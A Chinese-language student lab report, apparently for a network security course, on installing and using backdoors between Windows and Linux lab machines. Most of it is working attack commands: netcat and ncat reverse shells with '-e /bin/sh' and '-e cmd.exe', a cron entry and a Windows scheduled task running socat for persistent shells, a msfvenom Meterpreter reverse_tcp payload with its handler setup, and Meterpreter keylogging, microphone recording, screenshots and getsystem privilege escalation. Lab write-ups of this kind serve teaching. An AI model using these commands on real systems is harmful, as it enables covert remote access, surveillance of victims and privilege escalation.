1.例舉你能想到的一個後門進入到你係統中的可能方式?linux
2.例舉你知道的後門如何啓動起來(win及linux)的方式?git
3.Meterpreter有哪些給你映像深入的功能?web
4.如何發現本身有系統有沒有被安裝後門?shell
1.在Win下,先使用ipconfig
指令查看本機IP:172.30.6.22
vim
2.使用ncat.exe
程序監聽4308
端口:ncat -l -p 4308
windows
3.Linux在終端窗口使用nc Win的IP 端口號 -e /bin/sh
命令去鏈接Win的4308端口。
安全
4.鏈接成功後就能夠在Win的cmd
窗口中輸入Linux的命令,此時已經獲取了Linux的shell。
網絡
1.在Linux下使用ifconfig
命令查看本地主機IP:172.30.5.236
tcp
2.在Linux使用ncat.exe
程序監聽4308
端口:nc -l -p 4308
編輯器
3.Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口
命令去鏈接Linux的4308
端口:ncat.exe -e cmd.exe 172.30.5.236 4308
4.鏈接成功後就能夠在Linux的終端窗口中輸入Win的命令,此時已經獲取了Win的shell。
兩個步驟相似,只是執行命令的主機相反。
netcat根據課上所學簡單來說,就是利用tcp、udp鏈接進行基本的數據收發,在兩臺主機之間傳輸字符文件之類的,因此咱們在這裏嘗試用它在win和linux之間作一個後門。
1.Win使用ncat.exe -l 4308
命令監聽本機的4308
端口。
2.Linux使用nc 172.30.5.22 4308
命令去鏈接Win的4308
端口,其中的ip地址應爲linux的ip地址。
3.鏈接成功後便可傳輸數據,在linux終端輸入的字符能夠出如今win終端,而在win終端輸入的字符也會出如今linux終端。如上圖
4.也能夠利用以下命令將文件裏的內容做爲輸入,寫入到另外一臺主機的文件裏
nc -l 1234 > filename.out
nc host.example.com 1234 < filename.in
1.ncat.exe -l -p 4308
win運行ncat.exe監聽4308
端口。(忘記截圖)
2.crontab -e
Cron是Linux下的定時任務,每一分鐘運行一次,根據配置文件執行預設的指令。由於是第一次編輯,因此會提示選擇編輯器,咱們選擇3
,利用最基本的vim編輯器進行編輯。
(再次忘記截圖,由於當時卡在了怎麼編輯文件,看到了某一個學姐的博客以後才知道,仍是基礎知識掌握得不牢固,很不牢固,可是會加油的)
按a
進入編輯狀態,在文件最後一行添加18 * * * * /bin/netcat 172.30.6.22 4308 -e /bin/sh
表示在每一個小時的第18分鐘反向鏈接win的4308
端口。
添加完後:wq
存盤退出,配置即生效。
3.當時間到了18分時,win已經得到了linux的shell,能夠輸入ls等指令,而在18分之前,終端裏是不會有任何反應的。
1.在Win系統下,打開控制面板->系統和安全->管理工具->任務計劃程序,建立任務,填寫任務名稱20154308
新建一個觸發器,設置以下
2.下載socat軟件,下載地址[https://gitee.com/wildlinux/NetSec/attach_files](老師的講義裏給的附件)
在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:4308 exec:cmd.exe,pty,stderr
3.建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:
4.此時,在linux終端輸入指令socat - tcp:172.30.6.22:4308
,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Wind主機的4308端口,此時能夠發現已經成功得到了一個win shell:
1.生成後門程序msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.5.236 LPORT=4308 -f exe > 20154308_backdoor.exe
2.將生成的後門程序傳送到Win主機上ncat.exe -lv 4308 > 20154308_backdoor.exe
3.在linux上使用msfconsole指令進入msf控制檯,進行一系列以下設置
msfconsole
進入msf(圖案好像會不同,可是不太清楚是啥)
use exploit/multi/handler
進入handler模式
set payload windows/meterpreter/reverse_tcp
設置payload
set LHOST 172.30.5.236
設置LHOST
set LPORT 4308
設置LPORT
show options
查看當前信息狀態
exploit
msf開始監聽
4.20154308_backdoor.exe
在win上打開後門程序
5.而後能夠發現linux已經得到了Win shell
6.接下來就能夠利用msf作一些有趣的事情
record_mic
錄音
webcam_snap
拍照(惋惜沒有成功)
screenshot
截屏
使用keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄:
先使用getuid
指令查看當前用戶,使用getsystem
指令進行提權,如圖所示,提權成功
3.1 後門程序傳送到win後,win沒法打開後門程序
20154308_backdoor.exe
被查殺了3.2 沒法使用攝像頭進行偷拍,非常難過,檢查過設備管理器,確實是沒有攝像頭設備